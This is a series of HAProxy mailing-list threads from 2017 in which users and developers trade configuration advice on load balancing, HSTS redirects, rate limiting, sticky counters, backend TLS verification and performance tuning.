Servers A have haproxies which have a listen clause so that each server in
the B array will have one backend set. Clients in servers A will connect to
localhost so they will reach the haproxy in machine A which will route the
request to a suitable server B haproxy and where that haproxy will route it
to a worker in that node.

This works, but I'm not sure how I should tune my configurations that if
any server in the B array gets overloaded then the haproxies in server
array A would avoid this server? I'm thinking that I should use the
"retries" setting in haproxy A so that if it can't connect to the firstly
selected server B it would try another.


If you have a single B array server in the A listener the retries will not
help.

But I'm not sure how I should configure haproxy B so that this is done?


Sounds like you need more than one B array server per A listener so A can
retry or load balance if you like different one in case the first one
chosen is not responding.

If I set both maxconn and backlog settings low enough in B will this cause
this to happen and what is actually going in terms of SYN, SYN+ACK, kernel
backlog queues and in haproxy frontend queues?

I'm pretty sure I need to lab this out so that I can use wireshark to
really look what is going on, but the lab setup is non-trivial and I could
use some good theory how this should work.

 - Garo


Re: add header into http-request redirect

2017-02-26 Thread Igor Cicimov
Hi Lukas,

On 27 Feb 2017 5:53 am, "Lukas Tribus"  wrote:

Hi,



Am 26.02.2017 um 19:02 schrieb thierry.fourn...@arpalert.org:

> Hi,
>
> If I understand, the 301 is produced by haproxy. If it is the case,
> there are an ugly soluce.
>
> Haproxy can't add header to a redirect because redirect is a final
> directive. After executing the redirect no more action are executed.
>
> The trick is to create a listen proxy dedicated for redirect, and
> modify the response of these proxy from the main proxy. If a dedicated
> proxy produces the response, the main proxy considers this as forwarded
> traffic and can add headers.
>

Also see:
http://blog.haproxy.com/2015/06/09/haproxy-and-http-strict-t
ransport-security-hsts-header-in-http-redirects/


Lukas

Maybe I'm stupid but in the example from the link you sent:

frontend fe_myapp
 bind :443 ssl crt /path/to/my/cert.pem
 bind :80
 use_backend be_dummy if !{ ssl_fc }
 default_backend be_myapp

backend be_myapp
 http-response set-header Strict-Transport-Security max-age=1600;\
includeSubDomains;\ preload;
 server s1 10.0.0.1:80

be_dummy
 server haproxy_fe_dummy_ssl_redirect 127.0.0.1:8000

frontend fe_dummy
 bind 127.0.0.1:8000
 http-request redirect scheme https

I don't see how is the hsts header being inserted in the redirect?


Re: add header into http-request redirect

2017-02-26 Thread Igor Cicimov
On 27 Feb 2017 9:19 am, "Igor Cicimov" 
wrote:

Hi Lukas,

On 27 Feb 2017 5:53 am, "Lukas Tribus"  wrote:

Hi,



Am 26.02.2017 um 19:02 schrieb thierry.fourn...@arpalert.org:

> Hi,
>
> If I understand, the 301 is produced by haproxy. If it is the case,
> there are an ugly soluce.
>
> Haproxy can't add header to a redirect because redirect is a final
> directive. After executing the redirect no more action are executed.
>
> The trick is to create a listen proxy dedicated for redirect, and
> modify the response of these proxy from the main proxy. If a dedicated
> proxy produces the response, the main proxy considers this as forwarded
> traffic and can add headers.
>

Also see:
http://blog.haproxy.com/2015/06/09/haproxy-and-http-strict-t
ransport-security-hsts-header-in-http-redirects/


Lukas

Maybe I'm stupid but in the example from the link you sent:

frontend fe_myapp
 bind :443 ssl crt /path/to/my/cert.pem
 bind :80
 use_backend be_dummy if !{ ssl_fc }
 default_backend be_myapp

backend be_myapp
 http-response set-header Strict-Transport-Security max-age=1600;\
includeSubDomains;\ preload;
 server s1 10.0.0.1:80

be_dummy
 server haproxy_fe_dummy_ssl_redirect 127.0.0.1:8000

frontend fe_dummy
 bind 127.0.0.1:8000
 http-request redirect scheme https

I don't see how is the hsts header being inserted in the redirect?

Except if the purpose was to point to the fact that hsts in http response
is going to be ignored...


Re: Rate limit by country

2017-02-28 Thread Igor Cicimov
On Tue, Feb 28, 2017 at 2:29 PM, Simon Green  wrote:

> Hi all,
>
> I need to rate limit users by country[1], and my Google foo is failing
> me. I know that I can use "src_conn_rate gt N"[2], but that rate limits
> on a per IP basis. I want to be able to rate limit based on the total
> number of connections from a country, and have different limits for
> different countries.
>
> Is this possible with HAProxy, and if so, how?
>
> TIA for your guidance.
>
> --
> Simon
>
>
> [1] where "country" is defined by MaxMind's GeoIP list. It's not
> perfect, but better than nothing.
> [2] and along with src -f TLD.lst can set different limits for different
> countries.
>
>
https://github.com/berkayunal/haproxy-geoip-iprange


Re: Binding to interface as non-root user

2017-03-24 Thread Igor Cicimov
On 24 Mar 2017 5:18 pm, "Ankit Malp"  wrote:

tldr; Is there a way to bind a frontend to interface and still be able to
start HAProxy as root and later lower privileges to a non root user?

I asked this question at http://serverfault.com/questions/840039/haproxy-
interface-eth-aware-binding-as-non-root-user but did not get replies and
thought this community might be a better place. I have scenario where i
need to listen explicitly on network interfaces. This works great if i do
not set an explicit lower privileged user (proxy runs as root throughout
its life).

However, I would prefer to not run the proxy as root.

Config snippet

global
#Works only without below line but its implication is running as root user
user haproxy

frontend frontend_tcp_eth1
mode tcp
bind 0.0.0.0:80 interface eth1

Simply do iptables

iptables -t nat -I PREROUTING -p tcp --dport 80 -j REDIRECT --to-port 8080

and have haproxy listen on port 8080


Reading through the docs, i only see root permissions necessary to bind for
outgoing connections but not for listening to an interface. Am I missing
something?

https://cbonte.github.io/haproxy-dconv/1.6/management.html#13
"HAProxy will need to be started as root in order to :
   - adjust the file descriptor limits
   - bind to privileged port numbers
   - bind to a specific network interface
   - transparently listen to a foreign address
   - isolate itself inside the chroot jail
   - drop to another non-privileged UID
HAProxy may require to be run as root in order to :
   - bind to an interface for outgoing connections
   - bind to privileged source ports for outgoing connections
   - transparently bind to a foreing address for outgoing connections
Most users will never need the "run as root" case. But the "start as root"
covers most usages."

Thanks,
Ankit


Re: trying to understand sticky counters

2017-04-20 Thread Igor Cicimov
Hi Adam,

On Wed, Apr 12, 2017 at 3:00 AM, Adam Spiers  wrote:

> Hi all,
>
> I've pored over the Configuration Manual again and again, and I'm
> still struggling to fully understand sticky counters.  This paragraph
> seems to hold some important information:
>
>Once a "track-sc*" rule is executed, the key is looked up in the table
>and if it is not found, an entry is allocated for it. Then a pointer to
>that entry is kept during all the session's life, and this entry's
>counters are updated as often as possible, every time the session's
>counters are updated, and also systematically when the session ends.
>Counters are only updated for events that happen after the tracking has
>been started. As an exception, connection counters and request counters
>are systematically updated so that they reflect useful
>information.
>
> It seems that one of the key concepts here is "session".  I'm assuming
> that this actually means "TCP session", as in layer 5 of the OSI
> model; is that correct?


Just a correction here, see
https://en.wikipedia.org/wiki/Session_layer#Comparison_with_TCP.2FIP_model


> Unfortunately there is nowhere in the manual
> which explicitly states this definition, despite countless uses of the
> term, but there are some hints scattered around, e.g. in the
> "tcp-request session" section:
>
>Once a session is validated, (ie. after all handshakes have been
> completed),
>
> and in the "reject" part of the "tcp-request connection" section.
>
> It seems that each session can have a maximum of three entries
> associated with it in stick-tables, because there is a maximum of 3
> sets of sticky counters per connection.  And these entries could
> potentially be in 1, 2, or 3 different stick-tables, depending on
> where and how the track-scX directive is written, right?
>
> Thirdly, I'm struggling to understand these examples:
>
>  Example: accept all connections from white-listed hosts, reject too fast
>   connection without counting them, and track accepted connections.
>   This results in connection rate being capped from abusive
> sources.
>
>tcp-request connection accept if { src -f
> /etc/haproxy/whitelist.lst }
>tcp-request connection reject if { src_conn_rate gt 10 }
>tcp-request connection track-sc0 src
>
>  Example: accept all connections from white-listed hosts, count all other
>   connections and reject too fast ones. This results in abusive
> ones
>   being blocked as long as they don't slow down.
>
>tcp-request connection accept if { src -f
> /etc/haproxy/whitelist.lst }
>tcp-request connection track-sc0 src
>tcp-request connection reject if { sc0_conn_rate gt 10 }
>
> The stick-table directives are missing, but my experiments suggest
> that not only they are mandatory, but also they must track conn_rate
> samples, otherwise HAProxy has no way to know the duration of the
> sliding time window which the connection rate relates to, and nothing
> will get rejected.  So I think the examples should include those
> directives for clarity.  When I added this, it worked for me:
>
> stick-table type ip size 100k store conn_rate(30s)
>
> Furthermore, I don't understand the explanation text which says
> "without counting them".  If they're not counted, how can the
> connection rate be measured?  So what is the real difference between
> these two examples?
>
> I'd be really grateful for any light which can be shed here.  I'm
> normally pretty good at inhaling large, complex technical manuals, but
> I've really been struggling with HAProxy's for some reason :-/
>
> Thanks!
> Adam
>
>


-- 
Igor Cicimov | DevOps


p. +61 (0) 433 078 728
e. ig...@encompasscorporation.com <http://encompasscorporation.com/>
w*.* www.encompasscorporation.com
a. Level 4, 65 York Street, Sydney 2000


Re: Passing SNI value ( ssl_fc_sni ) to backend's verifyhost.

2017-05-05 Thread Igor Cicimov
On 6 May 2017 2:04 am, "Kevin McArthur"  wrote:

When doing tls->haproxy->tls (bridged https) re-encryption with SNI, we
need to verify the backend certificate against the SNI value requested by
the client.

Something like server options:

server app1 app1.example.ca:443 ssl no-sslv3 sni ssl_fc_sni verify required
verifyhost ssl_fc_sni

However, the "verifyhost ssl_fc_sni" part doesn't work at current. Is there
any chance I could get this support patched in?

Most folks seem to be either ignoring the backend server validation,
setting verify none, or are stripping tls altogether leaving a pretty big
security hole.

Care to elaborate why is this a security hole if the backend servers are in
internal LAN which usually is the case when terminating ssl on the proxy?


--

Kevin McArthur


Re: HAProxy makes backend unresponsive when handling multiple thousand connections per second

2017-06-21 Thread Igor Cicimov
On 21 Jun 2017 6:11 pm, "Daniel Heitepriem" 
wrote:

Hi Jarno,

yes we are decrypting TLS on the frontend (official SSL-certificate) and
re-encrypt it before sending it to the backend (company policy so not that
easy to change it to an unencrypted connection). The CPU usage is not
higher than 15-20% even during peak times and the memory usage is also
quite low (200-800MB).

Regards,
Daniel

Am 21.06.17 um 10:00 schrieb Jarno Huuskonen:

Hi,
>
> On Wed, Jun 21, Daniel Heitepriem wrote:
>
>> we got a problem recently which we can't explain to ourself. We got
>> a java application (Tomcat WAR-File) which has to handle several
>> million of requests per day and several thousand requests per second
>> during peak times. Due to this high amount we are splitting traffic
>> using an ACL in "booking traffic" and "availability traffic".
>> Booking traffic is negligible but the Availability traffic is
>> load-balanced over several application servers. The problem that
>> occurs is that our external partner "floods" the
>> Availability-Frontend with several thousand requests per second and
>> the backend becomes unresponsive. If we redirect them directly to
>>
> Looks like you're decrypting tls/ssl on frontend and then
> re-encrypting on backend/server. Is one core(you're not using nbproc?)
> able to handle thousand ssl requests coming in and going out ?
> (is haproxy process using 100% cpu).
>
> -Jarno
>
>
What do you see in the haproxy log when the problem happens?


Re: HAProxy makes backend unresponsive when handling multiple thousand connections per second

2017-06-21 Thread Igor Cicimov
On 21 Jun 2017 6:34 pm, "Daniel Heitepriem" 
wrote:

Nothing special. No errors, no dropped connections just an increased server
response time (Tr). An excerpt from low and high traffic times is below:

Jun 20 18:05:29 localhost haproxy[13426]: ndc vakanz-backend/10.2.8.28
client_ip:193.XX.XX.XXX client_port:50876 SSL_version:TLSv1.2
SSL_cypher:DHE-RSA-AES256-GCM-SHA384 -- Tt:157 Tq:95 Tw:0 Tc:2 Tr:60
Jun 20 18:05:29 localhost haproxy[13426]: ndc vakanz-backend/10.2.8.41
client_ip:193.XX.XX.XXX client_port:32910 SSL_version:TLSv1.2
SSL_cypher:DHE-RSA-AES256-GCM-SHA384 -- Tt:148 Tq:82 Tw:0 Tc:1 Tr:65
Jun 20 18:05:30 localhost haproxy[13426]: ndc vakanz-backend/10.2.8.40
client_ip:193.XX.XX.XXX client_port:51077 SSL_version:TLSv1.2
SSL_cypher:DHE-RSA-AES256-GCM-SHA384 -- Tt:525 Tq:312 Tw:0 Tc:2 Tr:211

Jun 20 22:05:36 localhost haproxy[13426]: ndc vakanz-backend/10.2.8.28
client_ip:193.XX.XX.XXX client_port:48936 SSL_version:TLSv1.2
SSL_cypher:DHE-RSA-AES256-GCM-SHA384 -- Tt:25368 Tq:101 Tw:0 Tc:3 Tr:25264
Jun 20 22:05:36 localhost haproxy[13426]: ndc vakanz-backend/10.2.8.41
client_ip:193.XX.XX.XXX client_port:43030 SSL_version:TLSv1.2
SSL_cypher:DHE-RSA-AES256-GCM-SHA384 -- Tt:23474 Tq:88 Tw:0 Tc:2 Tr:23383
Jun 20 22:05:36 localhost haproxy[13426]: ndc vakanz-backend/10.2.8.40
client_ip:193.XX.XX.XXX client_port:18935 SSL_version:TLSv1.2
SSL_cypher:DHE-RSA-AES256-GCM-SHA384 -- Tt:26150 Tq:106 Tw:0 Tc:3 Tr:26040


Am 21.06.17 um 10:21 schrieb Igor Cicimov:



On 21 Jun 2017 6:11 pm, "Daniel Heitepriem" 
wrote:

Hi Jarno,

yes we are decrypting TLS on the frontend (official SSL-certificate) and
re-encrypt it before sending it to the backend (company policy so not that
easy to change it to an unencrypted connection). The CPU usage is not
higher than 15-20% even during peak times and the memory usage is also
quite low (200-800MB).

Regards,
Daniel

Am 21.06.17 um 10:00 schrieb Jarno Huuskonen:

Hi,
>
> On Wed, Jun 21, Daniel Heitepriem wrote:
>
>> we got a problem recently which we can't explain to ourself. We got
>> a java application (Tomcat WAR-File) which has to handle several
>> million of requests per day and several thousand requests per second
>> during peak times. Due to this high amount we are splitting traffic
>> using an ACL in "booking traffic" and "availability traffic".
>> Booking traffic is negligible but the Availability traffic is
>> load-balanced over several application servers. The problem that
>> occurs is that our external partner "floods" the
>> Availability-Frontend with several thousand requests per second and
>> the backend becomes unresponsive. If we redirect them directly to
>>
> Looks like you're decrypting tls/ssl on frontend and then
> re-encrypting on backend/server. Is one core(you're not using nbproc?)
> able to handle thousand ssl requests coming in and going out ?
> (is haproxy process using 100% cpu).
>
> -Jarno
>
>
What do you see in the haproxy log when the problem happens?


-- 
Mit freundlichen Gruessen / Best regards
Daniel Heitepriem

pribas GmbH

Valterweg 24-25
65817 Eppstein-Bremthal
Germany

Phone  +49 (0) 6198 57146400 <+49%206198%2057146400>
Fax   +49 (0) 6198 57146433 <+49%206198%2057146433>
eMail   daniel.heitepr...@pribas.com

Corporate Headquarters: Huenfelden-Dauborn Managing Director: Arnulf Pribas
Registration: Amtsgericht Limburg a. d. Lahn 7HRB874 Tax ID: DE113840457

This e-mail is confidential. Information in this e-mail is intended for the
exclusive use of the individual or entity named above and may constitute
information that is privileged or confidential or otherwise protected from
disclosure. The information in this e-mail may be read, published, copied
and/or forwarded only by the individual or entity named above.
Dissemination, distribution, forwarding or copying of this e-mail by anyone
other than the intended recipient is prohibited. If you have received this
e-mail in error, please notify us immediately by telephone or e-mail and
completely delete or destroy any and all disseminated, distributed,
forwarded electronic or other copies of the original message and any
attachments.

Daniel, if using ssl to the backends shouldn't you use http mode? Per your
config you are using tcp which is default one. Afaik tcp is for ssl
passthrough.


Re: HAProxy makes backend unresponsive when handling multiple thousand connections per second

2017-06-21 Thread Igor Cicimov
Yes saw it but too late. Anyway according to the timers the Tr:26040 means
it took 26 seconds for the server to send the response. Any errors in the
backend logs?

client_ip:193.XX.XX.XXX client_port:18935 SSL_version:TLSv1.2
SSL_cypher:DHE-RSA-AES256-GCM-SHA384 -- Tt:26150 Tq:106 Tw:0 Tc:3 Tr:26040


Try adding:

option httpclose

in the backend and see if that helps.

On 21 Jun 2017 7:48 pm, "Daniel Heitepriem" 
wrote:

Hi Igor,

the config is set to "mode http" (see below) only the log output is set to
"tcplog" to be able to get a more detailed log output. Please correct me if
I'm wrong but regarding to the config HTTP-mode is (or at least should be)
used.


defaults
log global
option tcplog
log-format %f\ %b/%s\ client_ip:%ci\ client_port:%cp\
SSL_version:%sslv\ SSL_cypher:%sslc\ %ts\ Tt:%Tt\ Tq:%Tq\ Tw:%Tw\ Tc:%Tc\
Tr:%Tr
mode http
timeout connect 5000
timeout check 5000
timeout client 3
timeout server 3
retries 3

frontend ndc
http-response set-header Strict-Transport-Security max-age=31536000;\
includeSubdomains;\ preload
http-response set-header X-Content-Type-Options nosniff

bind *:443 ssl crt /opt/etc/haproxy/domain_com.pem force-tlsv12 no-sslv3
maxconn 2

acl fare_availability path_beg /ndc/fare/v1/availability
acl flight_availability path_beg /ndc/flight/v1/availability
use_backend vakanz-backend if flight_availability or fare_availability
default_backend booking-backend

backend booking-backend
server 10.2.8.28 10.2.8.23:8443 check ssl verify none minconn 500
maxconn 500

backend vakanz-backend
server 10.2.8.28 10.2.8.28:8443 check ssl verify none minconn 500
maxconn 500
server 10.2.8.40 10.2.8.40:8443 check ssl verify none minconn 500
maxconn 500
server 10.2.8.41 10.2.8.41:8443 check ssl verify none minconn 500
maxconn 500

Regards,
Daniel

Am 21.06.17 um 11:37 schrieb Igor Cicimov:



On 21 Jun 2017 6:34 pm, "Daniel Heitepriem" 
wrote:

Nothing special. No errors, no dropped connections just an increased server
response time (Tr). An excerpt from low and high traffic times is below:

Jun 20 18:05:29 localhost haproxy[13426]: ndc vakanz-backend/10.2.8.28
client_ip:193.XX.XX.XXX client_port:50876 SSL_version:TLSv1.2
SSL_cypher:DHE-RSA-AES256-GCM-SHA384 -- Tt:157 Tq:95 Tw:0 Tc:2 Tr:60
Jun 20 18:05:29 localhost haproxy[13426]: ndc vakanz-backend/10.2.8.41
client_ip:193.XX.XX.XXX client_port:32910 SSL_version:TLSv1.2
SSL_cypher:DHE-RSA-AES256-GCM-SHA384 -- Tt:148 Tq:82 Tw:0 Tc:1 Tr:65
Jun 20 18:05:30 localhost haproxy[13426]: ndc vakanz-backend/10.2.8.40
client_ip:193.XX.XX.XXX client_port:51077 SSL_version:TLSv1.2
SSL_cypher:DHE-RSA-AES256-GCM-SHA384 -- Tt:525 Tq:312 Tw:0 Tc:2 Tr:211

Jun 20 22:05:36 localhost haproxy[13426]: ndc vakanz-backend/10.2.8.28
client_ip:193.XX.XX.XXX client_port:48936 SSL_version:TLSv1.2
SSL_cypher:DHE-RSA-AES256-GCM-SHA384 -- Tt:25368 Tq:101 Tw:0 Tc:3 Tr:25264
Jun 20 22:05:36 localhost haproxy[13426]: ndc vakanz-backend/10.2.8.41
client_ip:193.XX.XX.XXX client_port:43030 SSL_version:TLSv1.2
SSL_cypher:DHE-RSA-AES256-GCM-SHA384 -- Tt:23474 Tq:88 Tw:0 Tc:2 Tr:23383
Jun 20 22:05:36 localhost haproxy[13426]: ndc vakanz-backend/10.2.8.40
client_ip:193.XX.XX.XXX client_port:18935 SSL_version:TLSv1.2
SSL_cypher:DHE-RSA-AES256-GCM-SHA384 -- Tt:26150 Tq:106 Tw:0 Tc:3 Tr:26040


Am 21.06.17 um 10:21 schrieb Igor Cicimov:



On 21 Jun 2017 6:11 pm, "Daniel Heitepriem" 
wrote:

Hi Jarno,

yes we are decrypting TLS on the frontend (official SSL-certificate) and
re-encrypt it before sending it to the backend (company policy so not that
easy to change it to an unencrypted connection). The CPU usage is not
higher than 15-20% even during peak times and the memory usage is also
quite low (200-800MB).

Regards,
Daniel

Am 21.06.17 um 10:00 schrieb Jarno Huuskonen:

Hi,
>
> On Wed, Jun 21, Daniel Heitepriem wrote:
>
>> we got a problem recently which we can't explain to ourself. We got
>> a java application (Tomcat WAR-File) which has to handle several
>> million of requests per day and several thousand requests per second
>> during peak times. Due to this high amount we are splitting traffic
>> using an ACL in "booking traffic" and "availability traffic".
>> Booking traffic is negligible but the Availability traffic is
>> load-balanced over several application servers. The problem that
>> occurs is that our external partner "floods" the
>> Availability-Frontend with several thousand requests per second and
>> the backend becomes unresponsive. If we redirect them directly to
>>
> Looks like you're decrypting tls/ssl on frontend and then
> re-encrypting on backend/server. Is one core(you're not using nbproc?)
> able to handle thousand ssl requests coming in and going out ?
> (is haproxy process using 100% c

Re: HAProxy makes backend unresponsive when handling multiple thousand connections per second

2017-06-21 Thread Igor Cicimov
Sorry, replace httpclose with  http-server-close

On 21 Jun 2017 7:55 pm, "Igor Cicimov" 
wrote:

> Yes saw it but too late. Anyway according to the timers the Tr:26040 means
> it took 26 seconds for the server to send the response. Any errors in the
> backend logs?
>
> client_ip:193.XX.XX.XXX client_port:18935 SSL_version:TLSv1.2
> SSL_cypher:DHE-RSA-AES256-GCM-SHA384 -- Tt:26150 Tq:106 Tw:0 Tc:3 Tr:26040
>
>
> Try adding:
>
> option httpclose
>
> in the backend and see if that helps.
>
> On 21 Jun 2017 7:48 pm, "Daniel Heitepriem" 
> wrote:
>
> Hi Igor,
>
> the config is set to "mode http" (see below) only the log output is set to
> "tcplog" to be able to get a more detailed log output. Please correct me if
> I'm wrong but regarding to the config HTTP-mode is (or at least should be)
> used.
>
>
> defaults
> log global
> option tcplog
> log-format %f\ %b/%s\ client_ip:%ci\ client_port:%cp\
> SSL_version:%sslv\ SSL_cypher:%sslc\ %ts\ Tt:%Tt\ Tq:%Tq\ Tw:%Tw\ Tc:%Tc\
> Tr:%Tr
> mode http
> timeout connect 5000
> timeout check 5000
> timeout client 3
> timeout server 3
> retries 3
>
> frontend ndc
> http-response set-header Strict-Transport-Security max-age=31536000;\
> includeSubdomains;\ preload
> http-response set-header X-Content-Type-Options nosniff
>
> bind *:443 ssl crt /opt/etc/haproxy/domain_com.pem force-tlsv12
> no-sslv3
> maxconn 2
>
> acl fare_availability path_beg /ndc/fare/v1/availability
> acl flight_availability path_beg /ndc/flight/v1/availability
> use_backend vakanz-backend if flight_availability or fare_availability
> default_backend booking-backend
>
> backend booking-backend
> server 10.2.8.28 10.2.8.23:8443 check ssl verify none minconn 500
> maxconn 500
>
> backend vakanz-backend
> server 10.2.8.28 10.2.8.28:8443 check ssl verify none minconn 500
> maxconn 500
> server 10.2.8.40 10.2.8.40:8443 check ssl verify none minconn 500
> maxconn 500
> server 10.2.8.41 10.2.8.41:8443 check ssl verify none minconn 500
> maxconn 500
>
> Regards,
> Daniel
>
> Am 21.06.17 um 11:37 schrieb Igor Cicimov:
>
>
>
> On 21 Jun 2017 6:34 pm, "Daniel Heitepriem" 
> wrote:
>
> Nothing special. No errors, no dropped connections just an increased
> server response time (Tr). An excerpt from low and high traffic times is
> below:
>
> Jun 20 18:05:29 localhost haproxy[13426]: ndc vakanz-backend/10.2.8.28
> client_ip:193.XX.XX.XXX client_port:50876 SSL_version:TLSv1.2
> SSL_cypher:DHE-RSA-AES256-GCM-SHA384 -- Tt:157 Tq:95 Tw:0 Tc:2 Tr:60
> Jun 20 18:05:29 localhost haproxy[13426]: ndc vakanz-backend/10.2.8.41
> client_ip:193.XX.XX.XXX client_port:32910 SSL_version:TLSv1.2
> SSL_cypher:DHE-RSA-AES256-GCM-SHA384 -- Tt:148 Tq:82 Tw:0 Tc:1 Tr:65
> Jun 20 18:05:30 localhost haproxy[13426]: ndc vakanz-backend/10.2.8.40
> client_ip:193.XX.XX.XXX client_port:51077 SSL_version:TLSv1.2
> SSL_cypher:DHE-RSA-AES256-GCM-SHA384 -- Tt:525 Tq:312 Tw:0 Tc:2 Tr:211
>
> Jun 20 22:05:36 localhost haproxy[13426]: ndc vakanz-backend/10.2.8.28
> client_ip:193.XX.XX.XXX client_port:48936 SSL_version:TLSv1.2
> SSL_cypher:DHE-RSA-AES256-GCM-SHA384 -- Tt:25368 Tq:101 Tw:0 Tc:3 Tr:25264
> Jun 20 22:05:36 localhost haproxy[13426]: ndc vakanz-backend/10.2.8.41
> client_ip:193.XX.XX.XXX client_port:43030 SSL_version:TLSv1.2
> SSL_cypher:DHE-RSA-AES256-GCM-SHA384 -- Tt:23474 Tq:88 Tw:0 Tc:2 Tr:23383
> Jun 20 22:05:36 localhost haproxy[13426]: ndc vakanz-backend/10.2.8.40
> client_ip:193.XX.XX.XXX client_port:18935 SSL_version:TLSv1.2
> SSL_cypher:DHE-RSA-AES256-GCM-SHA384 -- Tt:26150 Tq:106 Tw:0 Tc:3 Tr:26040
>
>
> Am 21.06.17 um 10:21 schrieb Igor Cicimov:
>
>
>
> On 21 Jun 2017 6:11 pm, "Daniel Heitepriem" 
> wrote:
>
> Hi Jarno,
>
> yes we are decrypting TLS on the frontend (official SSL-certificate) and
> re-encrypt it before sending it to the backend (company policy so not that
> easy to change it to an unencrypted connection). The CPU usage is not
> higher than 15-20% even during peak times and the memory usage is also
> quite low (200-800MB).
>
> Regards,
> Daniel
>
> Am 21.06.17 um 10:00 schrieb Jarno Huuskonen:
>
> Hi,
>>
>> On Wed, Jun 21, Daniel Heitepriem wrote:
>>
>>> we got a problem recently which we can't explain to ourself. We got
>>> a java application (Tomcat WAR-File) which has to handle several
>>> million of requests per day and several thousand requests per second
>>> during peak times. Due to this high amount we are splitting traffic
>>> us

Re: HAProxy makes backend unresponsive when handling multiple thousand connections per second

2017-06-21 Thread Igor Cicimov
Hi Lukas,

On 22 Jun 2017 3:02 am, "Lukas Tribus"  wrote:

Hello,


> Daniel, if using ssl to the backends shouldn't you use http mode?
> Per your config you are using tcp which is default one. Afaik tcp
> is for ssl passthrough.

For the record, this is not true. Just because you need TCP mode
for TLS passthrough, doesn't mean you have to use HTTP mode when
terminating TLS.

Actually, terminating TLS while using TCP mode is a quite common
configuration (for example with HTTP/2).


Thanks for clarifying this.




>> Try adding:
>> option httpclose
>> in the backend and see if that helps.
>
> Sorry, replace httpclose with  http-server-close

Actually, I would have suggested the opposite: making the whole
thing less expensive, by going full blown keep-alive with
http-reuse:

option http-keep-alive
option prefer-last-server
timeout http-keep-alive 30s
http-reuse safe


Keep-alive is on by default hence my suggestion to use the opposite. Of
course keep-alive enabled is always better especially in case of ssl.




> global
>  ulimit-n 2

Why specify ulimit? Haproxy will do this for you, you are just
asking for trouble. I suggest you remove this.



Maybe something on your backend (conntrack or the application)
is rate-limiting per IP, or the aggressive client your are facing
is keep-aliving properly with the backend, while it doesn't when
using haproxy.


I would apply the keep-alive configurations above and I would
also suggest that you check the CPU load on your backend server
as connections through haproxy become unresponsive, because that
CPU can be saturated due to TLS negotiations as well.


That's what the haproxy log shows, the response time from the tomcat
backend is high suggesting something is wrong. Maybe something that you
mentioned above (which makes sesnse), some system settings or if we can see
the tomcat connector settings (and logs possibly) maybe something there is
causing issues.



Regards,
Lukas


Re: Reg: HAProxy 1.6.12 on RHEL7.2 (MAXCONN in FRONT-END/LISTEN BLOCK)

2017-06-28 Thread Igor Cicimov
Hi all,

On Thu, Jun 29, 2017 at 11:23 AM, Velmurugan Dhakshnamoorthy <
dvel@gmail.com> wrote:

> Thanks Much Andrew,  I will definitely explore on this.
>
> Thanks again.
>
> On Jun 28, 2017 22:03, "Andrew Smalley"  wrote:
>
>> Hi Vel
>>
>> Form what you describe the example using the tarpit feature may help you
>> taken from here https://blog.codecentric.de/en
>> /2014/12/haproxy-http-header-rate-limiting/
>>
>> frontend fe_api_ssl
>>   bind 192.168.0.1:443 ssl crt /etc/haproxy/ssl/api.pem no-sslv3 ciphers ...
>>   default_backend be_api
>>
>>   tcp-request inspect-delay 5s
>>
>>   acl document_request path_beg -i /v2/documents
>>   acl is_upload hdr_beg(Content-Type) -i multipart/form-data
>>   acl too_many_uploads_by_user sc0_gpc0_rate() gt 100
>>   acl mark_seen sc0_inc_gpc0 gt 0
>>
>>   stick-table type string size 100k store gpc0_rate(60s)
>>
>>   tcp-request content track-sc0 hdr(Authorization) if METH_POST 
>> document_request is_upload
>>
>>   use_backend 429_slow_down if mark_seen too_many_uploads_by_user
>>
>> backend be_429_slow_down
>>   timeout tarpit 2s
>>   errorfile 500 /etc/haproxy/errorfiles/429.http
>>   http-request tarpit
>>
>>
>>
>> Andrew Smalley
>>
>> Loadbalancer.org Ltd.
>> www.loadbalancer.org 
>>
>> 
>> 
>> 
>> 
>> 
>> +1 888 867 9504 <%2%29%20867-9504> / +44 (0)330 380 1064
>> <+44%20330%20380%201064>
>> asmal...@loadbalancer.org
>>
>> Leave a Review
>>  | Deployment
>> Guides
>> 
>> | Blog 
>>
>> On 28 June 2017 at 10:01, Velmurugan Dhakshnamoorthy 
>> wrote:
>>
>>> Hi Lukas,
>>> Thanks for your response in length. As I mentioned earlier, I was not
>>> aware that the people from discourse forum and this email d-list group are
>>> same. I am 100% new to HAProxy.
>>>
>>> Let me explain my current situation in-detail in this email thread,
>>> Kindly check if you or other people from the group can guide me.
>>>
>>> Our requirement to use HAProxy is NOT to load balance back-end (Weblogic
>>> 12c) servers, we have a singe backend instance (ex: PIA1), our server
>>> capacity is not high to handle the heavy traffic during peak load, the peak
>>> load occurs only 2 times in a year, that's a reason we are not scaling up
>>> our server resources as they will be idle majority of the time.
>>>
>>> we would like to use HAProxy to throttle http/tcp connections during the
>>> peak load, so that weblogic backed will not go to Out-Of-Memory
>>> state/PeopleSoft will not crash.
>>>
>>> To achieve http throttling,when setting maxconn to back end , HAProxy
>>> queue up further connections and releases once the active http connections
>>> become idle,however how weblogic works is, once the PeopleSoft URL is
>>> accessed and user is authenticated , cookie will be inserted to browser and
>>> cookie will be active by default 20 minutes, which mean even if user does
>>> not navigate and do anything inside the application, cookie session state
>>> will be retained in weblogic java heap. weblogic allocates small amount of
>>> memory in order to retain each active sessions (though memory allocation
>>> increase/decrease dynamically based on various business functionality i).
>>> as per current capacity , weblogic can retain only 100 session state ,
>>> which means, I don't want to forward any further connections to weblogic
>>> until some of the sessions from 100 are released (by default the session
>>> will be released when user clicks explicitly on signout button or
>>> inactivity timeout reaches 20 minutes).
>>>
>>> according to my understanding, maxconn in back-end throttles connections
>>> and releases to back-end as and when tcp connection status changed to idle,
>>> but though connections are idle, logout/signout not occurred from
>>> PeopleSoft, so that still session state are maintained in weblogic and not
>>> released and cannot handle further connections.
>>>
>>> that's reason, I am setting the maxconn in front end and keeping HTTP
>>> alive option ON, so that I can throttle connections at front end itself.
>>> According to my POC, setting maxconn in front-end behaves differently than
>>> setting in back-end, when it is on front-end, it hold further connections
>>> in kernel , once the existing http connections are closed, it allows
>>> further connections inside, in this I dont see any performance issue for
>>> existing connections.
>>>
>>> for your information HAProxy and Weblogic are residing in a same single
>>> VM.
>>>
>>> please let me know if my above understa

Re: How to forward HTTP / HTTPS to different backend proxy servers

2017-07-01 Thread Igor Cicimov
On 29 Jun 2017 2:46 am, "Daren Sefcik"  wrote:

On Wed, Jun 28, 2017 at 8:12 AM, Olivier Doucet  wrote:

> Hi,
>
>
> 2017-06-28 16:47 GMT+02:00 Daren Sefcik :
>
>> Hi, I have searched for an answer to this and tried several things but
